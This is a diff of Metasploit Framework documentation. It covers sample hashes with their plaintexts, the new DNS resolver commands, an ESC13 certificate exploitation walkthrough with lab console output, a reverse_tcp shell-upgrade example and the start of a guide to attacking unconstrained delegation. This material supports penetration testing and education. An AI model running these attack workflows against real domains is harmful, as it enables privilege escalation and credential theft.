+| MSSQL (2005)                         | mssql05_toto       | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908`                                                                                                                                                                                                               | toto         | mssql05              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MSSQL                                | mssql_foo          | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254`                                                                                                                                                                       | foo          | mssql                | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password!    | mssql12              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MySQL                                | mysql_probe        | `445ff82636a7ba59`                                                                                                                                                                                                                                                     | probe        | mysql                | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MySQL SHA1                           | mysql-sha1_tere    | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB`                                                                                                                                                                                                                            | tere         | mysql-sha1           | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
+| Oracle                               | simon              | `4F8BC1809CB2AF77`                                                                                                                                                                                                                                                     | A            | des,oracle           | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
+| Oracle                               | SYSTEM             | `9EEDFA0AD26C6D52`                                                                                                                                                                                                                                                     | THALES       | des,oracle           | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
+| Oracle 11                            | DEMO               | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon      | raw-sha1,oracle      | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
+| Oracle 11                            | oracle11_epsilon   | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon      | raw-sha1,oracle      | modules/auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases                         |
+| Oracle 12                            | oracle12_epsilon   | `H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B`                                                                | epsilon      | pbkdf2,oracle12c     | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
+| Postgres                             | example            | `md5be86a79bf2043622d58d5453c47d4860`                                                                                                                                                                                                                                  | password     | raw-md5,postgres     | auxiliary/scanner/postgres/postgres_hashdump     | auxiliary/analyze/crack_databases                         |
+| Android (Samsung) SHA1               | samsungsha1        | `D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1`                                                                                                                                                                                                            | 1234         | android-samsung-sha1 | post/android/gather/hashdump                     | modules/auxiliary/analyze/crack_mobile                    |
+| Android (non-Samsung) SHA1           | androidsha1        | `9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5`                                                                                                                                                                                                             | 1234         | android-sha1         | post/android/gather/hashdump                     | modules/auxiliary/analyze/crack_mobile                    |
+| Android MD5                          | androidmd5         | `1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5`                                                                                                                                                                                                                     | 1234         | android-md5          | post/android/gather/hashdump                     | modules/auxiliary/analyze/crack_mobile                    |
+| OSX 10.4-10.6                        | xsha_hashcat       | `1430823483d07626ef8be3fda2ff056d0dfd818dbfe47683`                                                                                                                                                                                                                     | hashcat      | xsha                 | post/osx/gather/hashdump                         | modules/auxiliary/analyze/crack_osx                       |
+| OSX 10.8+                            | pbkdf2_hashcat     | `$ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f9$`                                                                                                                        | hashcat      | PBKDF2-HMAC-SHA512   | post/osx/gather/hashdump                         | modules/auxiliary/analyze/crack_osx                       |
+| OSX 10.7                             | xsha512_hashcat    | `648742485c9b0acd786a233b2330197223118111b481abfa0ab8b3e8ede5f014fc7c523991c007db6882680b09962d16fd9c45568260531bdb34804a5e31c22b4cfeb32d`                                                                                                                             | hashcat      | xsha512              | post/osx/gather/hashdump                         | modules/auxiliary/analyze/crack_osx                       |
+| HMAC-MD5                             | hmac_password      | `<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9`                                                                                                                                                                                                              | password     | hmac-md5             | auxiliary/server/capture/smtp                    |                                                           |
+| SHA512($p.$s)/dynamic_82/vmware ldap | vmware_ldap        | `$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6`                                                                                    | TestPass123# | dynamic_82           |                                                  |                                                           |
+| MediaWiki                            | mediawiki_hashcat  | `$B$56668501$0ce106caa70af57fd525aeaf80ef2898`                                                                                                                                                                                                                         | hashcat      | mediawiki            |                                                  | modules/auxiliary/analyze/crack_webapps                   |
+| PHPPass (P type)                     | phpass_p_hashcat   | `$P$984478476IagS59wHZvyQMArzfx58u.`                                                                                                                                                                                                                                   | hashcat      | phpass               |                                                  | modules/auxiliary/analyze/crack_webapps                   |
+| PHPPass (H type)                     | phpass_h_hashcat   | `$H$984478476IagS59wHZvyQMArzfx58u.`                                                                                                                                                                                                                                   | hashcat      | phpass               |                                                  | modules/auxiliary/analyze/crack_webapps                   |
+| Atlassian                            | atlassian_hashcat  | `{PKCS5S2}NzIyNzM0NzY3NTIwNjI3MdDDis7wPxSbSzfFqDGf7u/L00kSEnupbz36XCL0m7wa`                                                                                                                                                                                            | hashcat      | PBKDF2-HMAC-SHA1     |                                                  | modules/auxiliary/analyze/crack_webapps                   |

 # Adding a New Hash

@@ -0,0 +1,165 @@
+# Metasploit DNS
+## Background
+Most applications that need to handle hostname to IP address lookups rely on the host operating system, either by
+passing the hostname directly to the socket-creation function or by calling a purpose built API such as `getaddrinfo`.
+This was also how Metasploit handled name lookups and would only directly communicate with a DNS server when the request
+was more involved than mapping a hostname to an IPv4 or IPv6 address.
+
+One flaw in this approach is that when pivoting connections over a session, the DNS lookups would occur through the host
+on which Metasploit was running instead of the compromised host from which the connection would originate. This lead to
+two issues, the first being the aforementioned DNS leaks and the second that Metasploit could not always resolve
+hostnames that the compromised system could.
+
+Starting in Metasploit 6.4, Metasploit uses an internal DNS resolution system that grants the user a high degree of
+control over the process of DNS queries.
+
+## The DNS command
+Metasploit's DNS configuration is controlled by the `dns` command which has multiple subcommands.
+
+The current configuration can be printed by running `dns print`:
+
+```msf6
+msf6 > dns print
+Default search domain: N/A
+Default search list:   lab.lan
+Current cache size:    0
+
+Resolver rule entries
+=====================
+
+   #  Rule    Resolver    Comm channel
+   -  ----    --------    ------------
+   1  *                   
+   .    \_    static      N/A
+   .    \_    127.0.0.53  
+
+
+Static hostnames
+================
+
+   Hostname                 IPv4 Address   IPv6 Address
+   --------                 ------------   ------------
+   localhost                127.0.0.1      ::1
+     \_                     127.1.1.1      
+   localhost.localdomain    127.0.0.1      ::1
+   localhost4               127.0.0.1      
+   localhost4.localdomain4  127.0.0.1      
+   localhost6                              ::1
+   localhost6.localdomain6                 ::1
+```
+
+The `help` subcommand can be used to display the available subcommands. The name of a subcommand can also be specified 
+as an argument to `help` to display additional information about that subcommand, for example `dns help add`.
+
+Metasploit's DNS system is composed of the following major components: resolver rules, static entries and the cache.
+
+## DNS Resolver Rules
+DNS resolver rules are a single wildcard that is associated with zero or more resolver types. When a query name matches
+the wildcard expression, the associated resolvers are used in succession until one is capable of fulfilling the request.
+For example, a wildcard pattern of `*.lab.lan` would match `www.lab.lan` and `_ldap._tcp.lab.lan`, but not `lab.lan` or
+`msflab.lan`. Furthermore, the `*` wildcard pattern matches everything and should be used as a default rule.
+
+Once a rule that matches the query name is found, the specified resolvers will be tried in order until one is capable of
+handling the request. Different resolver types can be specified to handle queries in different ways. Rules are listed
+in numeric order starting at position 1. Rules can be added to or removed from specific positions in a similar manner to
+how iptables rules can be added to and removed from a specific chain.
+
+### The Black Hole Resolver
+The black hole resolver can be used to prevent queries from being resolved. It handles all query types and will prevent
+resolvers defined after it from being used. The black hole resolver is specified by using the `black-hole` keyword.
+
+### The Upstream Resolver
+An upstream resolver can be used by specifying either an IPv4 or IPv6 address. When Metasploit uses this resolver, the
+defined host will be contacted over the network. A session can optionally be defined through which network traffic will
+be sent.
+
+### The System Resolver
+The system resolver can be used for hostname resolution to either IPv4 or IPv6 addresses by invoking the host operating
+system's API. This is particularly useful in cases where the system's API is expected to be hooked by an external entity
+such as proxychains. The system resolver is specified by using the `system` keyword. Queries that can not be fulfilled
+by simply translating the query name to an IP address (e.g. PTR, TXT and SRV queries) will use the next resolver that is
+configured in the rule.
+
+### The Static Resolver
+The static resolver can be used for hostname resolution to either IPv4 or IPv6 addresses through a static mapping that
+is configured within Metasploit. This functionality is analogous to the `hosts` file found on many systems which defines
+static hostname to IP address associations. The static resolver is specified by using the `static` keyword. Queries that
+can not be fulfilled by simply translating the query name to an IP address (e.g. PTR, TXT and SRV queries) will use the
+next resolver that is configured in the rule.
+
+See [Static DNS Entries](#static-dns-entries) for configuring static entries.
+
+### Example Rules
+
+Define a single rule in the first position to handle all queries through three resolvers, first checking if there is a
+static entry in Metasploit then using the system resolver and finally specifying an upstream DNS server to handle any
+other query type.
+
+```
+dns add --index 1 --rule * static system 192.0.2.1
+```
+
+Append a rule to the end that will handle all queries for `*.lab.lan` using an upstream server contacted through session
+1.
+
+```
+dns add --rule *.lab.lan --session 1 192.0.2.1
+```
+
+Append a rule to drop all queries for `*.noresolve.lan` using the black hole resolver.
+
+```
+dns add --rule *.noresolve.lan black-hole
+```
+
+## Static DNS Entries
+Static entries used by the static resolver are configured through the `add-static` and `remove-static` subcommands. The
+currently configured entries can be viewed in the `dns print` output and all entries can be flushed with the
+`flush-static` subcommand. Static entries that are configured are shared across *all* rules in which a static resolver
+is specified. In order for the static entry to be used, at least one rule must match the hostname, and that rule must be
+configured to use the static resolver. A single hostname can be associated with multiple IP addresses and the same IP
+address can be associated with multiple hostnames.
+
+### Example Static Entries
+
+Define static entries for `localhost` and common variations.
+
+```
+dns add-static localhost  127.0.0.1 ::1
+dns add-static localhost4 127.0.0.1
+dns add-static localhost6 ::1
+```
+
+Remove all static entries for `localhost`.
+
+```
+dns remove-static localhost
+```
+
+Remove all static entries.
+
+```
+dns flush-static
+```
+
+## The DNS Cache
+DNS query replies are cached internally by Metasploit based on their TTL. This intends to minimize the amount of network
+traffic required to perform the necessary lookups. The number of query replies that are currently cached is available in
+the `dns print` output and all replies can be flushed with the `flush-cache` subcommand.
+
+## Configuration Management
+The DNS configuration can be saved using the `save` command from the `msfconsole` command context. Once saved, the
+settings will be automatically restored the next time Metasploit starts up. Any changes that are made at runtime will be
+lost when Metasploit exits, unless the `save` command is used.
+
+### Resetting the Configuration
+The DNS configuration can be restored to the default state by using the `reset-config` subcommand. The default
+configuration:
+
+* Populates the static entries from the host operating system's `hosts` file
+* Defines a single rule that matches all query names whose first resolver is the `static` resolver and the remaining
+  resolvers are set from the host operating systems' resolv.conf file
+
+## Resolving hostnames
+The `resolve` subcommand can be used to resolve a hostname to either an IPv4 or IPv6 address. In doing so, the rule that
+was used to define the resolvers will be printed allowing the wildcard matching logic to be tested.
@@ -29,7 +29,7 @@ All of the above features can also be logically separated within workspaces. By

 ## Using msfdb

-Using msfdb is simple. If you are starting the database for the first time navigate to the folder Metasploit is saved to, and run `./msfdb init`.
+Using msfdb is simple. If you are starting the database for the first time navigate to the folder Metasploit is saved to, and run `./msfdb init`
 ```
 Creating database at /Users/your_current_account_name/.msf4/db
 Starting database at /Users/your_current_account_name/.msf4/db...success
@@ -39,9 +39,14 @@ Starting database at /Users/your_current_account_name/.msf4/db...success
 Creating initial database schema
 ```

-This looks like a lot of information, but all it's saying is that it's creating the database Metasploit will use to store information.
+This looks like a lot of information, but all it's saying is that it's creating the database Metasploit will use to store information.  If you start up msfconsole now it should automatically connect to the database, and if you run `db_status` you should see something like this:

-msfdb then needs to establish the credentials that are used in the Web Service. The Web Service is how Metasploit connects to the database we have just created. The first prompt asks you what username you want to use to connect to the database.
+```
+msf6 > db_status
+[*] Connected to msf. Connection type: postgresql.
+```
+
+You can also setup a Web Service, which Metasploit can use to connect to the database you have just created.  Msfdb needs to establish the credentials that are used in the Web Service. If you run `msfdb --component webservice init` the first prompt asks you what username you want to use to connect to the database:

 ```
 [?] Initial MSF web service account username? [your_current_account_name]:
@@ -8,7 +8,7 @@ There are two main ports for SMB:
 - 445/TCP - Newer versions of SMB use this port, were NetBIOS is not used.

 Other terminology to be aware of:
- SMB - Serer Message Blocks
+- SMB - Server Message Blocks
 - CIFS - Common Internet File System
 - Samba - A free software re-implementation of SMB, which is frequently found on unix-like systems

@@ -24,7 +24,7 @@ Metasploit has support for multiple SMB modules, including:
 There are more modules than listed here, for the full list of modules run the `search` command within msfconsole:

 ```msf
-msf6 > search mysql
+msf6 > search smb
 ```

 ### Lab Environment
@@ -20,3 +20,13 @@ run session=-1
 run session=-1 win_transfer=POWERSHELL
 run session=-1 win_transfer=VBS
 ```
+
+If you want to upgrade your shell with fine control over what payload, use the `PAYLOAD_OVERRIDE`, `PLATFORM_OVERRIDE`, and on windows, `PSH_ARCH_OVERRIDE`. All 3 options are required to set an override on windows, and the first two options are required on other platforms, unless you are not using an override.
+
+```
+use multi/manage/shell_to_meterpreter
+set SESSION 1
+set PAYLOAD_OVERRIDE windows/meterpreter/reverse_tcp
+set PLATFORM_OVERRIDE windows
+set PSH_ARCH_OVERRIDE x64
+```
@@ -24,7 +24,9 @@ The latest OS X installer package can also be downloaded directly here: <https:/

 ## Installing Metasploit on Windows

-Download the [latest Windows installer](https://windows.metasploit.com/metasploitframework-latest.msi) or [view older builds](https://windows.metasploit.com/). To install, simply download the .msi package, adjust your Antivirus as-needed to ignore c:\metasploit-framework, double-click and enjoy. The msfconsole command and all related tools will be added to the system %PATH% environment variable.
+Download the [latest Windows installer](https://windows.metasploit.com/metasploitframework-latest.msi) or [view older builds](https://windows.metasploit.com/).
+To install, download the `.msi` package, adjust your Antivirus as-needed to ignore `c:\metasploit-framework` and execute the installer by right-clicking the installer file and selecting "Run as Administrator".
+The msfconsole command and all related tools will be added to the system `%PATH%` environment variable.

 ### Windows Anti-virus software flags the contents of these packages!

@@ -5,18 +5,39 @@ for testing purposes.
 # Introduction to AD CS Vulnerabilities
 ```mermaid
 flowchart TD
-	escexp[Find vulnerable certificate templates\nvia ldap_esc_vulnerable_cert_finder] --> icpr[Issue certificates via icpr_cert]
-	icpr[Issue certificates via icpr_cert] --> ESC1{{ESC1}}
-	ESC1{{ESC1}} -- Via PKINIT --> pkinit{Authenticate to Kerberos}
-	icpr[Issue certificates via icpr_cert] --> users[Request certificates on behalf of other users]
-	users[Request certificates on behalf of other users] --> ESC2{{ESC2}}
-	users[Request certificates on behalf of other users] --> ESC3{{ESC3}}
-	ESC2{{ESC2}} -- Via PKINIT --> pkinit[Authenticate to Kerberos]
-	ESC3{{ESC3}} -- Via PKINIT --> pkinit[Authenticate to Kerberos]
-	ad_cs_template[Reconfigure certificates via ad_cs_cert_template] -- Exploit configuration --> icpr
+    subgraph ad_cs_cert_templates[<b>ad_cs_cert_templates</b>]
+        ESC4(ESC4)
+        update_template[<i>Update Template</i>]
+        ESC4 --> update_template
+    end
+    subgraph icpr_cert[<b>icpr_cert</b>]
+        ESC1(ESC1)
+        ESC2(ESC2)
+        ESC3(ESC3)
+        ESC13(ESC13)
+        alt_subject[<i>Alternate Subject Issuance</i>]
+        as_eagent[<i>Enrollment Agent Issuance</i>]
+        normal[<i>Normal Issuance</i>]
+
+        ESC1 --> alt_subject
+        ESC2 --> as_eagent
+        ESC3 --> as_eagent
+        ESC13 --> normal
+        as_eagent -- use new certificate --> normal
+    end
+    subgraph kerberos/get_ticket[<b>kerberos/get_ticket</b>]
+        PKINIT[<i>PKINIT</i>]
+    end
+    subgraph ldap_esc_vulnerable_cert_finder[<b>ldap_ecs_vulnerable_cert_finder</b>]
+        find_vulnerable_templates[<i>Find Vulnerable Templates</i>]
+    end
+    alt_subject --> PKINIT
+    find_vulnerable_templates --> icpr_cert
+    normal --> PKINIT
+    update_template --> ESC1
 ```

-The chart above showcases how one can go about attacking four common AD CS
+The chart above showcases how one can go about attacking five unique AD CS
 vulnerabilities, taking advantage of various flaws in how certificate templates are
 configured on an Active Directory Certificate Server.

@@ -30,8 +51,7 @@ administrator via Kerberos.
 Each certificate template vulnerability that will be discussed here has a ESC code, such
 as ESC1, ESC2. These ESC codes are taken from the original whitepaper that
 SpecterOps published which popularized these certificate template attacks, known as
-[Certified
-Pre-Owned](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf).
+[Certified Pre-Owned](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf).
 In this paper Will Schroeder and Lee Christensen described 8 different domain escalation
 attacks that they found they could conduct via misconfigured certificate templates:

@@ -52,29 +72,30 @@ attacks that they found they could conduct via misconfigured certificate templat
 - ESC7 - Vulnerable Certificate Authority Access Control
 - ESC8 - NTLM Relay to AD CS HTTP Endpoints

-Later, another
-[blog](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
-came out from Oliver Lyak which discovered ESC9 and ESC10, two more vulnerabilities that
-could allow normal domain joined users to abuse certificate template misconfigurations to
-gain domain administrator privileges.
+Later, additional techniques were disclosed by security researchers:

- ESC9 - No Security Extension - CT_FLAG_NO_SECURITY_EXTENSION flag set in
-  `msPKI-EnrollmentFlag`. Also `StrongCertificateBindingEnforcement` not set to 2 or
-  `CertificateMappingMethods` contains `UPN` flag.
- ESC10 - Weak Certificate Mappings -
-  `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
-  CertificateMappingMethods` contains `UPN` bit aka `0x4` or
-  `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc StrongCertificateBindingEnforcement` is set to `0`.
+- ESC9 - No Security Extension - CT_FLAG_NO_SECURITY_EXTENSION flag set in `msPKI-EnrollmentFlag`. Also
+  `StrongCertificateBindingEnforcement` not set to 2 or `CertificateMappingMethods` contains `UPN` flag.
+  - [Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and
+    more!](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
+- ESC10 - Weak Certificate Mappings - `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
+  CertificateMappingMethods` contains `UPN` bit aka `0x4` or `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc
+  StrongCertificateBindingEnforcement` is set to `0`.
+  - [Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and
+    more!](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
+- ESC11 - Relaying NTLM to ICPR - Relaying NTLM authentication to unprotected RPC interface is allowed due to lack of
+  the `IF_ENFORCEENCRYPTICERTREQUEST` flag on `Config.CA.Interface.Flags`.
+  - [Relaying to AD Certificate Services over
+    RPC](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)
+- ESC12 - A user with shell access to a CA server using a YubiHSM2 hardware security module can access the CA's private
+  key.
+  - [Shell access to ADCS CA with YubiHSM](https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-with-yubihsm)
+- ESC13 - Domain escalation via issuance policies with group links.
+  - [ADCS ESC13 Abuse Technique](https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53)
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc13]]

-Finally, we have ESC11, which was discovered by Compass Security and described in their
-[blog
-post](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/).
-
- ESC11 - Relaying NTLM to ICPR - Relaying NTLM authentication to unprotected RPC
-  interface is allowed due to lack of the `IF_ENFORCEENCRYPTICERTREQUEST` flag on `Config.CA.Interface.Flags`.
-
-Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, and ESC4. As such,
-this page only covers exploiting ESC1 to ESC4 at this time.
+Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, ESC4 and ESC13. As such,
+this page only covers exploiting ESC1 through ESC4 and ESC13 at this time.

 Before continuing, it should be noted that ESC1 is slightly different than ESC2 and ESC3
 as the diagram notes above. This is because in ESC1, one has control over the
@@ -134,7 +155,9 @@ Domain Controller (DC), and will run a set of LDAP queries to gather a list of c
 templates they make available for enrollment. It will then also query the permissions on both the CA and the certificate template to figure out
 which users or groups can use that certificate template to elevate their privileges.

-At this time, the module is capable of identifying techniques ESC1 through ESC3.
+Currently the module is capable of checking for certificates that are vulnerable to ESC1, ESC2, ESC3, and ESC13. The
+module is limited to checking for these techniques due to them being identifiable remotely from a normal user account by
+analyzing the objects in LDAP.

 Keep in mind though that there are two sets of permissions in play here though. There is one set of permissions on the CA server that control
 who is able to enroll in any certificate template from that server, and second set of permissions that control who is allowed to enroll in
@@ -858,6 +881,67 @@ msf6 auxiliary(admin/ldap/ad_cs_cert_template) >
 At this point the certificate template's configuration has been restored and the operator has a certificate that can be
 used to authenticate to Active Directory as the Domain Admin.

+# Exploiting ESC13
+To exploit ESC13, we need to target a certificate that has an issuance policy linked to a universal group in Active
+Directory. Unlike some of the other ESC techniques, successfully exploiting ESC13 isn't necessarily guaranteed to yield
+administrative privileges, rather the privileges that are gained are those of the group which is linked to by OID in the
+certificate template's issuance policy. The `auxiliary/gather/ldap_esc_vulnerable_cert_finder` module is capable of
+identifying certificates that meet the necessary criteria. When one is found, the module will include the group whose
+permissions will be included in the resulting Kerberos ticket in the notes section. In the following example, the
+ESC13-Test template is vulenerable to ESC13 and will yield a ticket including the ESC13-Group permissions.
+
+```
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
+...
+[*] Template: ESC13-Test
+[*]    Distinguished Name: CN=ESC13-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
+[*]    Vulnerable to: ESC13
+[*]    Notes: ESC13 groups: ESC13-Group
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
+[*]       * S-1-5-21-3474343397-3755413101-2031708755-513 (Domain Users)
+[*]       * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * collalabs1-SRV-ADDS01-CA
+[*]          Server: SRV-ADDS01.collalabs1.local
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*]             * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
+[*]             * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
+```
+
+In this case, the ticket can be issued with the `icpr_cert` module. No additional options are required to issue the
+certificate beyond the standard `CA`, `CERT_TEMPLATE`, target and authentication options.
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
+RHOSTS => 172.30.239.85
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+SMBUser => normaluser
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain COLLALABS1
+SMBDomain => COLLALABS1
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+SMBPass => normalpass
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA collalabs1-SRV-ADDS01-CA
+CA => collalabs1-SRV-ADDS01-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC13-Test
+CERT_TEMPLATE => ESC13-Test
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.30.239.85
+
+[+] 172.30.239.85:445 - The requested certificate was issued.
+[*] 172.30.239.85:445 - Certificate Email: normaluser@collalabs1.local
+[*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3474343397-3755413101-2031708755-10051
+[*] 172.30.239.85:445 - Certificate UPN: normaluser@collalabs1.local
+[*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20240226170310_default_172.30.239.85_windows.ad.cs_917878.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) with the `ESC13-Group`
+RID present in the Groups field of the TGT PAC.
+
 # Authenticating With A Certificate
 Metasploit supports authenticating with certificates in a couple of different ways. These techniques can be used to take
 further actions once a certificate has been issued for a particular identity (such as a Domain Admin user).
@@ -106,5 +106,5 @@ sequenceDiagram
 - AS-REP Roasting - Some Kerberos accounts may be configured with a `Do not require Kerberos preauthentication` flag. For these accounts a Kerberos TGT will be returned by the KDC without needing to authenticate. These TGTs can be bruteforced to learn the original user's credentials. The [[auxiliary/scanner/kerberos/kerberos_login|pentesting/active-directory/kerberos/kerberos_login.md#asreproasting]] module implements this workflow.
 - Forging Tickets - After compromising a KDC or service account it is possible to forge tickets for persistence. The [[auxiliary/admin/kerberos/forge_ticket|pentesting/active-directory/kerberos/forge_ticket.md]] module can forge both Golden and Silver tickets.
 - Inspecting Tickets - Kerberos tickets can be inspected with the [[auxiliary/admin/kerberos/inspect_ticket|pentesting/active-directory/kerberos/inspect_ticket.md]] module. If the encryption key is known, the decrypted contents can be displayed.
- [[Service authentication|kerberos/service_authentication.md]] - Using Kerberos to authenticate via services suh as WinRM/Microsoft SQL Server/SMB/LDAP/etc
+- [[Service authentication|kerberos/service_authentication.md]] - Using Kerberos to authenticate via services such as WinRM/Microsoft SQL Server/SMB/LDAP/etc
 - [[Kerberoasting|kerberos/kerberoasting.md]] - Finding services in Active Directory that are associated with normal user accounts which may have brute forcible encryption keys that lead to Active Directory credentials.
@@ -130,11 +130,13 @@ Required options:
 * `${Prefix}::Rhostname` -- The hostname of the target system. This value should be either the hostname `WIN-MIJZ318SQH` or
  the FQDN like `WIN-MIJZ318SQH.msflab.local`. i.e. `Smb::Rhostname=WIN-MIJZ318SQH.msflab.local`
 * `${Prefix}Domain` -- The domain name of the target system, e.g. `msflab.local`. i.e. `SmbDomain=msflab.local`
-* `DomainControllerRhost` -- The IP address of the domain controller to use for kerberos authentication. i.e. `DomainControllerRhost=192.168.123.13`

 Optional options:
+* `DomainControllerRhost` -- The IP address or hostname of the domain controller to use for Kerberos authentication.
+  i.e. `DomainControllerRhost=192.168.123.13`. If this value is not specified, Metasploit will look it up via the
+  realm's (the `${Prefix}Domain` option) SRV record in DNS.
 * `${Prefix}::Krb5Ccname` -- The path to a CCACHE file to use for authentication. This is comparable to setting the
-  `KRB5CCNAME` environment variable for other tools. If specified, the tickets it contains will be used. i.e. `KRB5CCNAME=/path/to/Administrator.ccache`
+  `KRB5CCNAME` environment variable for other tools. If specified, the tickets it contains will be used. i.e. `KRB5CCNAME=/path/to/Administrator.ccache`.
 * `KrbCacheMode` -- The cache storage mode to use, one of the following four options:
    * `none` -- No cache storage is used, new tickets are requested and no tickets are stored.
    * `read-only` -- Stored tickets from the cache will be used, but no new tickets are stored.
@@ -0,0 +1,226 @@
+# Unconstrained Delegation Exploitation
+
+If a computer account is configured for unconstrained delegation, and an attacker has administrative access to it then
+the attacker can leverage it to compromise the Active Directory domain.
+
+## Lab setup
+
+For this attack to work there must be a computer account (workstation or server) in the active directory domain that has
+been configured for unconstrained delegation.
+
+On the domain controller:
+
+1. Open "Active Directory Users and Computers"
+2. Navigate to the computer account, right click and select "Properties"
+3. In the "Delegation" tab, select "Trust this computer for delegation to any service (Kerberos only)"
+
+On the target computer:
+
+1. Force an update of group policy by running `gpupdate /force`
+2. Reboot the computer
+
+## Attack Workflow
+
+This attack assumes that the attacker has:
+
+1. The IP address of the domain controller.
+2. The active directory domain name.
+3. A compromised domain account (no special privileges are necessary).
+4. The ability to fully compromise a target system through some means.
+5. (Optional but recommended) Metasploit running with an attached database so the Kerberos ticket cache can be used.
+  Verify this using the `db_status` command.
+
+At a high-level the summary to leverage this attack chain is:
+
+1. Identify a target computer account configured with unconstrained delegation.
+2. Compromise that target computer account to open a Meterpreter session with administrative privileges (SYSTEM works).
+3. Coerce authentication to the compromised target from a domain controller.
+4. Dump the Kerberos tickets from the compromised targets to obtain a TGT from the domain controller's computer account.
+5. Use the TGT to authenticate to the domain controller as itself (the computer account).
+
+### Target Identification
